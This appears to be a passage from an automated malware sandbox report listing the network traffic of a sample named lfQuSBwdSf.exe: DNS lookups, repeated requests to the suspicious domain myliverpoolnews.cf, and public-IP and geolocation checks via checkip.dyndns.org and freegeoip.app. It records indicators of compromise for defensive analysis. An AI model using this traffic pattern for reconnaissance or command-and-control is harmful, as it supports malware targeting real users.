                                                        Apr 8, 2021 11:01:40.972173929 CEST5128153192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:01:40.984234095 CEST53512818.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:01:41.679163933 CEST4919953192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:01:41.692414045 CEST53491998.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:01:44.681437016 CEST5062053192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:01:44.724883080 CEST53506208.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:01:44.803056002 CEST6493853192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:01:44.847248077 CEST53649388.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:01:56.968020916 CEST6015253192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:01:56.980468035 CEST53601528.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:02.752123117 CEST5754453192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:02.764671087 CEST53575448.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:03.696585894 CEST5598453192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:03.709362984 CEST53559848.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:05.024367094 CEST6418553192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:05.036798000 CEST53641858.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:09.424561977 CEST6511053192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:09.451386929 CEST53651108.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:11.972204924 CEST5836153192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:11.984787941 CEST53583618.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:13.304059029 CEST6349253192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:13.316571951 CEST53634928.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:15.070406914 CEST6083153192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:15.082360983 CEST53608318.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:16.156286955 CEST6010053192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:16.168801069 CEST53601008.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:24.921981096 CEST5319553192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:24.934926033 CEST53531958.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:27.071579933 CEST5014153192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:27.085139990 CEST53501418.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:28.164998055 CEST5302353192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:28.176840067 CEST53530238.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:29.803163052 CEST4956353192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:29.815573931 CEST53495638.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:30.633725882 CEST5135253192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:30.646882057 CEST53513528.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:30.671216965 CEST5934953192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:30.683943987 CEST53593498.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:34.746850014 CEST5708453192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:34.758682013 CEST53570848.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:34.833126068 CEST5882353192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:34.845623016 CEST53588238.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:37.806899071 CEST5756853192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:37.819520950 CEST53575688.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:52.069416046 CEST5054053192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:52.087430000 CEST53505408.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:02:54.568016052 CEST5436653192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:02:54.587409973 CEST53543668.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:03.610271931 CEST5303453192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:03.622721910 CEST53530348.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:04.713150978 CEST5776253192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:04.725918055 CEST53577628.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:11.841286898 CEST5543553192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:11.854012012 CEST53554358.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:12.067235947 CEST5071353192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:12.079967022 CEST53507138.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:12.087239981 CEST5613253192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:12.099225998 CEST53561328.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:12.367260933 CEST5898753192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:12.386113882 CEST53589878.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:12.953145027 CEST5657953192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:12.965672970 CEST53565798.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:14.239921093 CEST6063353192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:14.253173113 CEST53606338.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:17.115955114 CEST6129253192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:17.128592968 CEST53612928.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:19.774718046 CEST6361953192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:19.801333904 CEST53636198.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:29.444453955 CEST6493853192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:29.457216024 CEST53649388.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:29.460191011 CEST6194653192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:29.472771883 CEST53619468.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:29.958946943 CEST6491053192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:29.971657991 CEST53649108.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:31.398861885 CEST5212353192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:31.411643982 CEST53521238.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:33.603425980 CEST5613053192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:33.617084980 CEST53561308.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:03:35.694166899 CEST5633853192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:03:35.712686062 CEST53563388.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:04:07.707721949 CEST5942053192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:04:07.720654011 CEST53594208.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:04:08.340862989 CEST5878453192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:04:08.372174978 CEST53587848.8.8.8192.168.2.3
                                                        Apr 8, 2021 11:04:27.249521017 CEST6397853192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:04:27.343425035 CEST53639788.8.8.8192.168.2.3

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Apr 8, 2021 11:01:44.681437016 CEST192.168.2.38.8.8.80x9e2dStandard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:01:44.803056002 CEST192.168.2.38.8.8.80x4547Standard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.746850014 CEST192.168.2.38.8.8.80x4c9dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.833126068 CEST192.168.2.38.8.8.80xd4a3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:54.568016052 CEST192.168.2.38.8.8.80x8bcbStandard query (0)freegeoip.appA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.067235947 CEST192.168.2.38.8.8.80x7afeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.087239981 CEST192.168.2.38.8.8.80xf800Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.367260933 CEST192.168.2.38.8.8.80xc04Standard query (0)freegeoip.appA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.444453955 CEST192.168.2.38.8.8.80x6506Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.460191011 CEST192.168.2.38.8.8.80xca10Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.958946943 CEST192.168.2.38.8.8.80xc9a5Standard query (0)freegeoip.appA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Apr 8, 2021 11:01:44.724883080 CEST8.8.8.8192.168.2.30x9e2dNo error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:01:44.724883080 CEST8.8.8.8192.168.2.30x9e2dNo error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:01:44.847248077 CEST8.8.8.8192.168.2.30x4547No error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:01:44.847248077 CEST8.8.8.8192.168.2.30x4547No error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.758682013 CEST8.8.8.8192.168.2.30x4c9dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.758682013 CEST8.8.8.8192.168.2.30x4c9dNo error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.758682013 CEST8.8.8.8192.168.2.30x4c9dNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.758682013 CEST8.8.8.8192.168.2.30x4c9dNo error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.758682013 CEST8.8.8.8192.168.2.30x4c9dNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.758682013 CEST8.8.8.8192.168.2.30x4c9dNo error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.845623016 CEST8.8.8.8192.168.2.30xd4a3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.845623016 CEST8.8.8.8192.168.2.30xd4a3No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.845623016 CEST8.8.8.8192.168.2.30xd4a3No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.845623016 CEST8.8.8.8192.168.2.30xd4a3No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.845623016 CEST8.8.8.8192.168.2.30xd4a3No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:34.845623016 CEST8.8.8.8192.168.2.30xd4a3No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:54.587409973 CEST8.8.8.8192.168.2.30x8bcbNo error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:02:54.587409973 CEST8.8.8.8192.168.2.30x8bcbNo error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.079967022 CEST8.8.8.8192.168.2.30x7afeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.079967022 CEST8.8.8.8192.168.2.30x7afeNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.079967022 CEST8.8.8.8192.168.2.30x7afeNo error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.079967022 CEST8.8.8.8192.168.2.30x7afeNo error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.079967022 CEST8.8.8.8192.168.2.30x7afeNo error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.079967022 CEST8.8.8.8192.168.2.30x7afeNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.099225998 CEST8.8.8.8192.168.2.30xf800No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.099225998 CEST8.8.8.8192.168.2.30xf800No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.099225998 CEST8.8.8.8192.168.2.30xf800No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.099225998 CEST8.8.8.8192.168.2.30xf800No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.099225998 CEST8.8.8.8192.168.2.30xf800No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.099225998 CEST8.8.8.8192.168.2.30xf800No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.386113882 CEST8.8.8.8192.168.2.30xc04No error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:12.386113882 CEST8.8.8.8192.168.2.30xc04No error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.457216024 CEST8.8.8.8192.168.2.30x6506No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.457216024 CEST8.8.8.8192.168.2.30x6506No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.457216024 CEST8.8.8.8192.168.2.30x6506No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.457216024 CEST8.8.8.8192.168.2.30x6506No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.457216024 CEST8.8.8.8192.168.2.30x6506No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.457216024 CEST8.8.8.8192.168.2.30x6506No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.472771883 CEST8.8.8.8192.168.2.30xca10No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.472771883 CEST8.8.8.8192.168.2.30xca10No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.472771883 CEST8.8.8.8192.168.2.30xca10No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.472771883 CEST8.8.8.8192.168.2.30xca10No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.472771883 CEST8.8.8.8192.168.2.30xca10No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.472771883 CEST8.8.8.8192.168.2.30xca10No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.971657991 CEST8.8.8.8192.168.2.30xc9a5No error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)
                                                        Apr 8, 2021 11:03:29.971657991 CEST8.8.8.8192.168.2.30xc9a5No error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • myliverpoolnews.cf
                                                        • checkip.dyndns.org

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.349700104.21.56.11980C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:01:44.763689041 CEST1125OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html HTTP/1.1
                                                        UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                        Host: myliverpoolnews.cf
                                                        Connection: Keep-Alive
                                                        Apr 8, 2021 11:01:44.789665937 CEST1126INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 08 Apr 2021 09:01:44 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 08 Apr 2021 10:01:44 GMT
                                                        Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html
                                                        cf-request-id: 0952505fc400002bd23ba83000000001
                                                        Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=XwmX5ySeaG4eevDa%2FP04VvipikZHPpRO%2FF3tIBV5NbuBA2RpBCIKkMorKYyO4EloOW3yiVGy%2BM7wNR%2FPg%2FysydqcyAkokNUfW2jqEcewsFpbnBQ%3D"}],"max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 63ca5012dfb72bd2-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
                                                        Apr 8, 2021 11:01:45.927328110 CEST2428OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html HTTP/1.1
                                                        UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                        Host: myliverpoolnews.cf
                                                        Apr 8, 2021 11:01:45.947901011 CEST2429INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 08 Apr 2021 09:01:45 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 08 Apr 2021 10:01:45 GMT
                                                        Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html
                                                        cf-request-id: 095250644f00002bd223b7d000000001
                                                        Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2FM5OpJ9ZNhUXYnGpSkNb%2FUtZPySDSsvajfeM4j8STf9GIOWR45sdkEsLIhpSSfqEN7XEGXfP8XhuLIkYDfbs2LuwkZfpRXsVYCZSjrNCUOzV2wU%3D"}],"max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 63ca501a1bb42bd2-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
                                                        Apr 8, 2021 11:01:48.776110888 CEST3738OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.html HTTP/1.1
                                                        UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                        Host: myliverpoolnews.cf
                                                        Apr 8, 2021 11:01:48.797709942 CEST3739INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 08 Apr 2021 09:01:48 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 08 Apr 2021 10:01:48 GMT
                                                        Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.html
                                                        cf-request-id: 0952506f7100002bd2259ac000000001
                                                        Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ThxZPwViEomojqqL9TYKZl1FY0onC5hnScyCYl%2BZodngPBmYO9P1MTEK1lipzYJy0Mh8OBpGnFzpFVupNRQJ0RL8kyCbxJWmlX1LJu945sWb1Eo%3D"}],"max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 63ca502bea0c2bd2-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.349720162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:02:35.342420101 CEST4915OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2021 11:02:35.450606108 CEST4915INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        10192.168.2.349755162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:15.023585081 CEST5053OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:15.128920078 CEST5054INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        11192.168.2.349762162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:17.074606895 CEST5064OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:17.180192947 CEST5065INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        12192.168.2.349764162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:18.124327898 CEST5077OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:18.229459047 CEST5078INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        13192.168.2.349765162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:19.316049099 CEST5078OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:19.421181917 CEST5084INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        14192.168.2.349768162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:20.784250021 CEST5106OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:20.889914036 CEST5106INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
